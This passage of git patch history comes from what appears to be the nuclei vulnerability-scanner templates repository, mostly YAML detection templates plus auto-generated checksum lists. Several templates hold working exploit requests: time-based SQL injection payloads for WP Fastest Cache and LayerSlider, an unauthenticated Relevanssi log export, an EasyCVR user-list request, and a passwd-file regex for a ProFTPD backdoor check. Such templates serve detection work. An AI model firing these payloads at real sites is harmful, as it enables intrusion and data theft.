title="EasyCVR" tags: unauth,easycvr,misconfig +flow: http(1) && http(2) + http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + words: + - "EasyCVR" + + - type: status + status: + - 200 + - method: GET path: - "{{BaseURL}}/api/v1/userlist?pageindex=0&pagesize=10" + matchers-condition: and matchers: - type: word words: From dba6004666057ed7c138b9a951af65b7ff434efe Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 5 Jun 2024 12:33:25 +0530 Subject: [PATCH 666/847] updated macthers,path,req & info --- .../cves/2024/CVE-2024-1380.yaml | 29 ++++++++++--------- 1 file changed, 16 insertions(+), 13 deletions(-) rename CVE-2024-1380.yaml => http/cves/2024/CVE-2024-1380.yaml (59%) diff --git a/CVE-2024-1380.yaml b/http/cves/2024/CVE-2024-1380.yaml similarity index 59% rename from CVE-2024-1380.yaml rename to http/cves/2024/CVE-2024-1380.yaml index 62848e8eb1..082b145c72 100644 --- a/CVE-2024-1380.yaml +++ b/http/cves/2024/CVE-2024-1380.yaml @@ -1,36 +1,39 @@ id: CVE-2024-1380 info: - name: Relevanssi - A Better Search <= 4.22.0 - Unauthenticated Query Log Export + name: Relevanssi (A Better Search) <= 4.22.0 - Query Log Export author: FLX severity: medium description: | The Relevanssi Search plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check in all versions up to, and including, 4.22.0. This makes it possible for unauthenticated attackers to export the query log data. reference: - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-1380 - - https://www.wordfence.com/threat-intel/vulnerabilities/id/7b2a3b17-0551-4e02-8e6a-ae8d46da0ef8?source=cve - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3033880%40relevanssi&new=3033880%40relevanssi&sfp_email=&sfph_mail= + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7b2a3b17-0551-4e02-8e6a-ae8d46da0ef8?source=cve + - https://nvd.nist.gov/vuln/detail/CVE-2024-1380 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2024-1380 epss-score: 0.00043 epss-percentile: 0.0866 - tags: wordpress,relevanssi,cve,vulnerability,cve2024 + metadata: + verified: true + max-request: 1 + fofa-query: "/wp-content/plugins/relevanssi/" + tags: cve,cve2024,wp,wordpress,wp-plugin,relevanssi,exposure http: - - method: POST - path: - - "{{BaseURL}}/wp-admin/admin-ajax.php" + - raw: + - | + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - headers: - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - - body: "action=&relevanssi_export=1" + action=&relevanssi_export=1 matchers: - type: dsl dsl: - 'status_code == 200' - - 'contains(header, "Content-Disposition: attachment;filename=relevanssi_log.csv")' - - 'contains(header, "Content-Type: application/download")' \ No newline at end of file + - 'contains_all(header, "filename=relevanssi_log.csv", "application/download")' + condition: and From 37b761ab59d6e51ffff50b2822475fe667cb06ed Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 5 Jun 2024 12:54:31 +0530 Subject: [PATCH 667/847] Fix typo in CVE-2024-2879.yaml --- http/cves/2024/CVE-2024-2879.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2024/CVE-2024-2879.yaml b/http/cves/2024/CVE-2024-2879.yaml index f07dc24c46..0b69067169 100644 --- a/http/cves/2024/CVE-2024-2879.yaml +++ b/http/cves/2024/CVE-2024-2879.yaml @@ -45,7 +45,7 @@ http: - raw: - | @timeout: 10s - GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))x)--+x) HTTP/1.1' + GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))x)--+x) HTTP/1.1 Host: {{Hostname}} matchers: @@ -55,4 +55,4 @@ http: - status_code == 200 - contains(body, "<script>") condition: and -# digest: 4b0a0048304602210093a5b04866b078b807cfbd803744ae129e205970fc34c73f9973d5bfabdd2355022100ddc08432b37d7c1696f3d5b2e311091d4815737e67056280e524abc9c49b4f3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210093a5b04866b078b807cfbd803744ae129e205970fc34c73f9973d5bfabdd2355022100ddc08432b37d7c1696f3d5b2e311091d4815737e67056280e524abc9c49b4f3d:922c64590222798bb761d5b6d8e72950 From cb69f0018d6d4763371cf1d360051014cad3566b Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 5 Jun 2024 07:27:56 +0000 Subject: [PATCH 669/847] Auto Generated Templates Checksum [Wed Jun 5 07:27:56 UTC 2024] :robot: --- templates-checksum.txt | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 56e923c90f..961e7a54e7 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3294,7 +3294,7 @@ http/cves/2024/CVE-2024-27956.yaml:b6cecd7a2c5dd148c961bcacc9d6bc9075c9b90c http/cves/2024/CVE-2024-28255.yaml:d7b149c542f2dba2d719e547ddc497ad029532e8 http/cves/2024/CVE-2024-28734.yaml:282a40ba7cd7f653bfbc9f16397b9c6115ca18b1 http/cves/2024/CVE-2024-2876.yaml:33b7f45b1e5e63e6936315618a667d8cd07d054b -http/cves/2024/CVE-2024-2879.yaml:8f4368955da161211eeaa0efc6bc9074fc1aeabb +http/cves/2024/CVE-2024-2879.yaml:08b2573251894249985623de851c6b1a013507ec http/cves/2024/CVE-2024-29059.yaml:8a60190e64510b3ac7fba68a3aced102feceb5c5 http/cves/2024/CVE-2024-29269.yaml:b0c582055d752cae9d0837e9c4919e94c0fdf100 http/cves/2024/CVE-2024-3097.yaml:8e86907f792754159cff9538655c090689d79784 @@ -3729,7 +3729,7 @@ http/exposed-panels/corebos-panel.yaml:f5c97e99526a78856683eab9bead66f41151d5bb http/exposed-panels/cortex-xsoar-login.yaml:73c55686323fbaf56a48c90d96ca1a55295d78f6 http/exposed-panels/couchdb-exposure.yaml:ff98d142744ff74de39b724b5733b9584e39697d http/exposed-panels/couchdb-fauxton.yaml:b0447223641003425221f1a22f1809b82bc64558 -http/exposed-panels/cox-business-panel.yaml:57fc005509d4bf4caa98e0c3a179742bb3d29b09 +http/exposed-panels/cox-business-panel.yaml:69406ee37514b80af11858b11dd20786215a7f6e http/exposed-panels/cpanel-api-codes.yaml:a26ac3c4c4cb3e32b40376f94d2d4cd90387ead7 http/exposed-panels/craftcms-admin-panel.yaml:ad84bef6e6da1edf763aad80aaa6de3a91d2f395 http/exposed-panels/craftercms-panel.yaml:7746ab0c30459db7e6f5bf023bf55ec47a7eeb90 @@ -7012,7 +7012,7 @@ http/technologies/smtp2go-detect.yaml:6019a0c74e3488774d4f3909ee47c17cf6f5490b http/technologies/snipeit-panel.yaml:aeed56e720ca069ccc5fffae2c3a77a93642c89b http/technologies/sogo-detect.yaml:12c9d0bda8f9ed788ffc1ff04aca07cf08a21646 http/technologies/sonicwall-email-security-detect.yaml:661f432cedd68b0aacd6ef82aaf5fbfcb9c03281 -http/technologies/sparklighter-detect.yaml:afaadfd576d288a6071151c16878d9c1d5587dbf +http/technologies/sparklighter-detect.yaml:727d2d130399c76b2c47f9a22f4e58933d7fbef5 http/technologies/spinnaker-detect.yaml:1e4b0cf0ce948c69e22a6d1022e8065c23a9f072 http/technologies/splash-rendering-service.yaml:31a8465843cc494d2146c66dce532bf6ce4cc2b0 http/technologies/splunkhec-detect.yaml:b12fe8414a25f23ca27add683cf845cbb65c3f93 @@ -8625,7 +8625,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:909b2cd7fb45b7050c8683d35e03e9d35aa6751e +templates-checksum.txt:29d6b7a538b053b72b0c72fcff1bf8d27cfe5070 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 9599540b89fbe57a9084d4d674113e6a5f605182 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 5 Jun 2024 07:29:37 +0000 Subject: [PATCH 670/847] Auto Template Signing [Wed Jun 5 07:29:37 UTC 2024] :robot: --- http/cves/2024/CVE-2024-2879.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-2879.yaml b/http/cves/2024/CVE-2024-2879.yaml index 0b69067169..05ffbf675b 100644 --- a/http/cves/2024/CVE-2024-2879.yaml +++ b/http/cves/2024/CVE-2024-2879.yaml @@ -55,4 +55,4 @@ http: - status_code == 200 - contains(body, "<script>") condition: and -# digest: 4b0a0048304602210093a5b04866b078b807cfbd803744ae129e205970fc34c73f9973d5bfabdd2355022100ddc08432b37d7c1696f3d5b2e311091d4815737e67056280e524abc9c49b4f3d:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502201d08df52fd34a2899c7ad336122c98cb8a653f7b46dc73ca7520b4da782b28450221008fde2dd001e36505866de89454fb87ee47618f6289b7fa30f30abf8c45a71bbc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 57776fdf433a0c56b92148d722f15d94aa6bd51a Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 5 Jun 2024 13:09:33 +0530 Subject: [PATCH 671/847] Fix FN CVE-2023-6063.yaml --- http/cves/2023/CVE-2023-6063.yaml | 40 +++++++++++++------------------ 1 file changed, 16 insertions(+), 24 deletions(-) diff --git a/http/cves/2023/CVE-2023-6063.yaml b/http/cves/2023/CVE-2023-6063.yaml index a2a2062207..c2d70c1ddf 100644 --- a/http/cves/2023/CVE-2023-6063.yaml +++ b/http/cves/2023/CVE-2023-6063.yaml @@ -1,7 +1,7 @@ -id: CVE-2023-6063 +id: CVE-2023-6063 info: - name: WP Fastest Cache 1.2.2 - Unauthenticated SQL Injection + name: WP Fastest Cache 1.2.2 - SQL Injection author: DhiyaneshDK severity: high description: | @@ -22,7 +22,7 @@ info: epss-percentile: 0.90865 cpe: cpe:2.3:a:wpfastestcache:wp_fastest_cache:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 + max-request: 3 vendor: wpfastestcache product: wp_fastest_cache framework: wordpress @@ -30,32 +30,24 @@ info: fofa-query: body=/wp-content/plugins/wp-fastest-cache/ publicwww-query: /wp-content/plugins/wp-fastest-cache/ tags: cve,cve2023,wp-fastest-cache,wpscan,wordpress,wp-plugin -flow: http(1) && http(2) + +flow: | + for (var i = 0; i < 3; i++) { + http(1) + } http: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/wp-fastest-cache/readme.txt" + - raw: + - | + @timeout: 20s + GET /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Cookie: wordpress_logged_in=" AND (SELECT 5025 FROM (SELECT(SLEEP(6)))NkcI) AND "tqKU"="tqKU matchers: - type: dsl dsl: + - 'duration>=6' - 'status_code == 200' - - 'contains(body, "WP Fastest Cache")' + - 'contains(body, "/wp-")' condition: and - internal: true - - - method: GET - path: - - "{{BaseURL}}/wp-login.php" - headers: - Cookie: wordpress_logged_in=" AND (SELECT 5025 FROM (SELECT(SLEEP(7)))NkcI) AND "tqKU"="tqKU - - matchers: - - type: dsl - dsl: - - 'duration>=7' - - 'status_code == 200' - - 'contains(body, "wp-admin")' - condition: and -# digest: 490a00463044022034e6469fb175abf5f0ead5f467b0674899bfb4a1776a6188e97231cabcc92e7202206b25fdfb241ed91d4cee2ee05e8f798bd0bd1b0fcf6ece85993f972f331d224f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From ce1973b1d18bb611c564630d0828b95bc939f0b2 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Wed, 5 Jun 2024 13:16:41 +0530 Subject: [PATCH 672/847] added remediation --- http/cves/2024/CVE-2024-1380.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-1380.yaml b/http/cves/2024/CVE-2024-1380.yaml index 082b145c72..5a444936cd 100644 --- a/http/cves/2024/CVE-2024-1380.yaml +++ b/http/cves/2024/CVE-2024-1380.yaml @@ -6,6 +6,7 @@ info: severity: medium description: | The Relevanssi Search plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check in all versions up to, and including, 4.22.0. This makes it possible for unauthenticated attackers to export the query log data. + remediation: Fixed in 4.22.1 reference: - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3033880%40relevanssi&new=3033880%40relevanssi&sfp_email=&sfph_mail= - https://www.wordfence.com/threat-intel/vulnerabilities/id/7b2a3b17-0551-4e02-8e6a-ae8d46da0ef8?source=cve From f284d5654b5060d3722edda09e4f83cce0484319 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Wed, 5 Jun 2024 13:20:02 +0530 Subject: [PATCH 673/847] added internal: true --- http/vulnerabilities/other/easycvr-info-leak.yaml | 15 +++++++-------- 1 file changed, 7 insertions(+), 8 deletions(-) diff --git a/http/vulnerabilities/other/easycvr-info-leak.yaml b/http/vulnerabilities/other/easycvr-info-leak.yaml index a00a473043..94a5bab8a8 100644 --- a/http/vulnerabilities/other/easycvr-info-leak.yaml +++ b/http/vulnerabilities/other/easycvr-info-leak.yaml @@ -1,4 +1,5 @@ id: easycvr-info-leak + info: name: EasyCVR video management - Users Information Exposure author: pussycat0x @@ -19,15 +20,13 @@ http: path: - "{{BaseURL}}" - matchers-condition: and matchers: - - type: word - words: - - "<title>EasyCVR" - - - type: status - status: - - 200 + - type: dsl + internal: true + dsl: + - 'status_code == 200' + - 'contains(body, "<title>EasyCVR")' + condition: and - method: GET path: From 9b2a2fe13cde0485eb55e71160742cf57d230681 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Wed, 5 Jun 2024 13:20:57 +0530 Subject: [PATCH 674/847] fix trail space --- http/cves/2023/CVE-2023-6063.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2023/CVE-2023-6063.yaml b/http/cves/2023/CVE-2023-6063.yaml index c2d70c1ddf..a8830ef8e9 100644 --- a/http/cves/2023/CVE-2023-6063.yaml +++ b/http/cves/2023/CVE-2023-6063.yaml @@ -1,4 +1,4 @@ -id: CVE-2023-6063 +id: CVE-2023-6063 info: name: WP Fastest Cache 1.2.2 - SQL Injection From 598623a18eaa6f52f06c602f17022e180687315b Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Wed, 5 Jun 2024 07:53:02 +0000 Subject: [PATCH 675/847] Auto Generated New Template Addition List [Wed Jun 5 07:53:02 UTC 2024] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index d9ff43ffe7..b04d215c02 100644 --- a/.new-additions +++ b/.new-additions @@ -64,5 +64,7 @@ http/technologies/sparklighter-detect.yaml http/vulnerabilities/other/aquatronica-info-leak.yaml http/vulnerabilities/other/array-vpn-lfi.yaml http/vulnerabilities/other/cerio-dt-rce.yaml +http/vulnerabilities/other/easycvr-info-leak.yaml +javascript/backdoor/proftpd-backdoor.yaml network/detection/bitvise-ssh-detect.yaml passive/cves/2024/CVE-2024-25723.yaml From 46265ca151f44418964c225f0494a8ebf2241313 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 5 Jun 2024 07:53:11 +0000 Subject: [PATCH 676/847] Auto Generated Templates Checksum [Wed Jun 5 07:53:11 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 961e7a54e7..8ae99984f2 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3294,7 +3294,7 @@ http/cves/2024/CVE-2024-27956.yaml:b6cecd7a2c5dd148c961bcacc9d6bc9075c9b90c http/cves/2024/CVE-2024-28255.yaml:d7b149c542f2dba2d719e547ddc497ad029532e8 http/cves/2024/CVE-2024-28734.yaml:282a40ba7cd7f653bfbc9f16397b9c6115ca18b1 http/cves/2024/CVE-2024-2876.yaml:33b7f45b1e5e63e6936315618a667d8cd07d054b -http/cves/2024/CVE-2024-2879.yaml:08b2573251894249985623de851c6b1a013507ec +http/cves/2024/CVE-2024-2879.yaml:c2ce4ab84a2eac56ef529eeba7a3749e0394cd43 http/cves/2024/CVE-2024-29059.yaml:8a60190e64510b3ac7fba68a3aced102feceb5c5 http/cves/2024/CVE-2024-29269.yaml:b0c582055d752cae9d0837e9c4919e94c0fdf100 http/cves/2024/CVE-2024-3097.yaml:8e86907f792754159cff9538655c090689d79784 @@ -8388,6 +8388,7 @@ http/vulnerabilities/zzzcms/zzzcms-info-disclosure.yaml:daa2040c8238fbe51311e7ac http/vulnerabilities/zzzcms/zzzcms-ssrf.yaml:80348e0fda22d428224a9a62afae01b8380694a0 http/vulnerabilities/zzzcms/zzzcms-xss.yaml:61a6fd65556054e8e2a631080388aff7aed42f6b javascript/audit/mysql/mysql-load-file.yaml:d61333fa25344c2c59bbc1b18b5907a83ea48441 +javascript/backdoor/proftpd-backdoor.yaml:a50e27ef624d89532253c293b2d646d1cbbefe39 javascript/cves/2012/CVE-2012-2122.yaml:94abd222ef37d5fcab0bd7d4bd3801b63236762c javascript/cves/2016/CVE-2016-8706.yaml:2b62e791d6879ee11d4c9894198c31e6af8c2e05 javascript/cves/2019/CVE-2019-9193.yaml:11b9baf1c50e125986f9667f3538b5ebdf8f445b @@ -8625,7 +8626,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:29d6b7a538b053b72b0c72fcff1bf8d27cfe5070 +templates-checksum.txt:6a2d5af209d4d4dc55fcb6df1b0e142dccc53012 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 00e07adfadc66fa1d4612ceb6b763b6fe82de3c6 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Wed, 5 Jun 2024 07:53:51 +0000 Subject: [PATCH 678/847] Syncing Templates --- .github/workflows/templates-sync.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index bda9cc89ee..ec16888164 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -69,6 +69,8 @@ on: - 'http/vulnerabilities/other/aquatronica-info-leak.yaml' - 'http/vulnerabilities/other/array-vpn-lfi.yaml' - 'http/vulnerabilities/other/cerio-dt-rce.yaml' + - 'http/vulnerabilities/other/easycvr-info-leak.yaml' + - 'javascript/backdoor/proftpd-backdoor.yaml' - 'network/detection/bitvise-ssh-detect.yaml' - 'passive/cves/2024/CVE-2024-25723.yaml' workflow_dispatch: From b17695ae4b1cdd3e6aa288359c4eac0148f9a115 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 5 Jun 2024 07:54:57 +0000 Subject: [PATCH 679/847] Auto Template Signing [Wed Jun 5 07:54:57 UTC 2024] :robot: --- javascript/backdoor/proftpd-backdoor.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/javascript/backdoor/proftpd-backdoor.yaml b/javascript/backdoor/proftpd-backdoor.yaml index dec673b6fc..2275724aee 100644 --- a/javascript/backdoor/proftpd-backdoor.yaml +++ b/javascript/backdoor/proftpd-backdoor.yaml @@ -44,4 +44,5 @@ javascript: - type: regex regex: - - "root:.*:0:0:" \ No newline at end of file + - "root:.*:0:0:" +# digest: 4a0a00473045022100dd6e52def8924c5a01a17c75bb09fcc784f5f0353f2788939136ee3ecd00b9220220262dff383d49d22ef5a299f5352cd746313ee6814fee6dd76e6a0c8da707c5f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 492ee41107aee215e73c452c63904285aca83f77 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 5 Jun 2024 13:25:59 +0530 Subject: [PATCH 680/847] update flow --- http/cves/2023/CVE-2023-6063.yaml | 21 +++++++++++++++++---- 1 file changed, 17 insertions(+), 4 deletions(-) diff --git a/http/cves/2023/CVE-2023-6063.yaml b/http/cves/2023/CVE-2023-6063.yaml index a8830ef8e9..475d23fb11 100644 --- a/http/cves/2023/CVE-2023-6063.yaml +++ b/http/cves/2023/CVE-2023-6063.yaml @@ -1,4 +1,4 @@ -id: CVE-2023-6063 +id: CVE-2023-6063 info: name: WP Fastest Cache 1.2.2 - SQL Injection @@ -32,11 +32,24 @@ info: tags: cve,cve2023,wp-fastest-cache,wpscan,wordpress,wp-plugin flow: | - for (var i = 0; i < 3; i++) { - http(1) - } + if (http(1)) { + for (let i = 0; i < 2; i++) { + http(2); + }} http: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/wp-fastest-cache/readme.txt" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(body, "WP Fastest Cache")' + condition: and + internal: true + - raw: - | @timeout: 20s From cddc4138ef0369cf01c831aba67c2730fb5525df Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 5 Jun 2024 07:56:08 +0000 Subject: [PATCH 681/847] Auto Generated Templates Checksum [Wed Jun 5 07:56:08 UTC 2024] :robot: --- templates-checksum.txt | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 8ae99984f2..79de678485 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3317,6 +3317,7 @@ http/cves/2024/CVE-2024-3495.yaml:1f4e6d704c91902aa02887883d46718b45f87654 http/cves/2024/CVE-2024-3822.yaml:3b09a61773b3f696a26e7a152cfa5d1968aa9dc8 http/cves/2024/CVE-2024-4040.yaml:9470254ef11bec4f99022dac385a6198071a2cad http/cves/2024/CVE-2024-4348.yaml:82d6d18aedb35323e1c359a8467f30ab49a8aae9 +http/cves/2024/CVE-2024-4358.yaml:fbc541e9790dac108af524828c9e196d7c640e9a http/cves/2024/CVE-2024-4956.yaml:a00f92400517494320ec968d237c98bb1056de25 http/cves/2024/CVE-2024-5230.yaml:8b073f5f6aa9e22b66403c2c6297fb487fbade0c http/default-logins/3com/3Com-wireless-default-login.yaml:7c816fc8c0b14d7f9c5b111259ca75c4f96a4671 @@ -7770,6 +7771,7 @@ http/vulnerabilities/other/dss-download-fileread.yaml:99d5bcf47324083def79e63def http/vulnerabilities/other/duomicms-sql-injection.yaml:ee36f8e9e2bfda358c4851065c331d9988f55537 http/vulnerabilities/other/dzzoffice-xss.yaml:8e89cae5618ff076d9bdadce356bb4ae547844d4 http/vulnerabilities/other/eaa-app-lfi.yaml:97b0823d04ad3588ce93c66dd73c78dff743f1be +http/vulnerabilities/other/easycvr-info-leak.yaml:2857e400b48c9919fa9c889bb46b59318e0bc45e http/vulnerabilities/other/easyimage-downphp-lfi.yaml:c13b2da7bd29bd39b5c0e7b09d94a864c38367ac http/vulnerabilities/other/ecology-oa-file-sqli.yaml:6ac7efef6739bb5063e9b1787fe1c6120048a56a http/vulnerabilities/other/ecshop-sqli.yaml:151963cca04a4163b76e6ff7021db99290abc406 @@ -8388,7 +8390,7 @@ http/vulnerabilities/zzzcms/zzzcms-info-disclosure.yaml:daa2040c8238fbe51311e7ac http/vulnerabilities/zzzcms/zzzcms-ssrf.yaml:80348e0fda22d428224a9a62afae01b8380694a0 http/vulnerabilities/zzzcms/zzzcms-xss.yaml:61a6fd65556054e8e2a631080388aff7aed42f6b javascript/audit/mysql/mysql-load-file.yaml:d61333fa25344c2c59bbc1b18b5907a83ea48441 -javascript/backdoor/proftpd-backdoor.yaml:a50e27ef624d89532253c293b2d646d1cbbefe39 +javascript/backdoor/proftpd-backdoor.yaml:3773a0d97c81615104eb63d8d5fc8fe02348d0b6 javascript/cves/2012/CVE-2012-2122.yaml:94abd222ef37d5fcab0bd7d4bd3801b63236762c javascript/cves/2016/CVE-2016-8706.yaml:2b62e791d6879ee11d4c9894198c31e6af8c2e05 javascript/cves/2019/CVE-2019-9193.yaml:11b9baf1c50e125986f9667f3538b5ebdf8f445b @@ -8626,7 +8628,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:6a2d5af209d4d4dc55fcb6df1b0e142dccc53012 +templates-checksum.txt:962b4f3fd05cbcfe528d0fd64adcfec423f635b8 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 29c2ec1a0a185bd708602ea22b43e590ca3f58d1 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 5 Jun 2024 13:27:25 +0530 Subject: [PATCH 682/847] lint fix --- http/cves/2023/CVE-2023-6063.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2023/CVE-2023-6063.yaml b/http/cves/2023/CVE-2023-6063.yaml index 475d23fb11..7be5b08cdb 100644 --- a/http/cves/2023/CVE-2023-6063.yaml +++ b/http/cves/2023/CVE-2023-6063.yaml @@ -1,4 +1,4 @@ -id: CVE-2023-6063 +id: CVE-2023-6063 info: name: WP Fastest Cache 1.2.2 - SQL Injection From d7a9194e61ff3778ac4e54df4f331661662f55e4 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 5 Jun 2024 07:57:58 +0000 Subject: [PATCH 683/847] Auto Template Signing [Wed Jun 5 07:57:58 UTC 2024] :robot: --- http/cves/2024/CVE-2024-4358.yaml | 1 + http/vulnerabilities/other/easycvr-info-leak.yaml | 1 + 2 files changed, 2 insertions(+) diff --git a/http/cves/2024/CVE-2024-4358.yaml b/http/cves/2024/CVE-2024-4358.yaml index b2e32509c0..031ce07c3b 100644 --- a/http/cves/2024/CVE-2024-4358.yaml +++ b/http/cves/2024/CVE-2024-4358.yaml @@ -62,3 +62,4 @@ http: dsl: - '"Username: "+ user' - '"Password: "+ pass' +# digest: 4a0a00473045022073c556e756e6d6fb4b9792f22067ff76c6003d9505047f3905f340af05df6d48022100e433930cd957e1bf060ea49fa34577268b5f703eea322d42d45ed8153879fb57:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/other/easycvr-info-leak.yaml b/http/vulnerabilities/other/easycvr-info-leak.yaml index 94a5bab8a8..5ff933c1fa 100644 --- a/http/vulnerabilities/other/easycvr-info-leak.yaml +++ b/http/vulnerabilities/other/easycvr-info-leak.yaml @@ -44,3 +44,4 @@ http: - type: status status: - 200 +# digest: 4a0a004730450220559cf25013e8fadf841cbf3f2e1991451fe171f9c1e923a7b4aa4950c63fccd1022100e009237cf034f4190512efdf6f99a949c82da6a0101d5a73fb2f1b7df6ab9c70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From d7a5e1c0989944693b78f26e6ddcce9f176ef8fc Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Wed, 5 Jun 2024 08:06:58 +0000 Subject: [PATCH 684/847] Auto Generated New Template Addition List [Wed Jun 5 08:06:58 UTC 2024] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index b04d215c02..9d6d20d44f 100644 --- a/.new-additions +++ b/.new-additions @@ -6,12 +6,14 @@ http/cves/2022/CVE-2022-34534.yaml http/cves/2023/CVE-2023-2059.yaml http/cves/2023/CVE-2023-3077.yaml http/cves/2023/CVE-2023-48084.yaml +http/cves/2024/CVE-2024-1380.yaml http/cves/2024/CVE-2024-21683.yaml http/cves/2024/CVE-2024-24919.yaml http/cves/2024/CVE-2024-27348.yaml http/cves/2024/CVE-2024-34470.yaml http/cves/2024/CVE-2024-3495.yaml http/cves/2024/CVE-2024-3822.yaml +http/cves/2024/CVE-2024-4358.yaml http/cves/2024/CVE-2024-5230.yaml http/default-logins/ampjuke-default-login.yaml 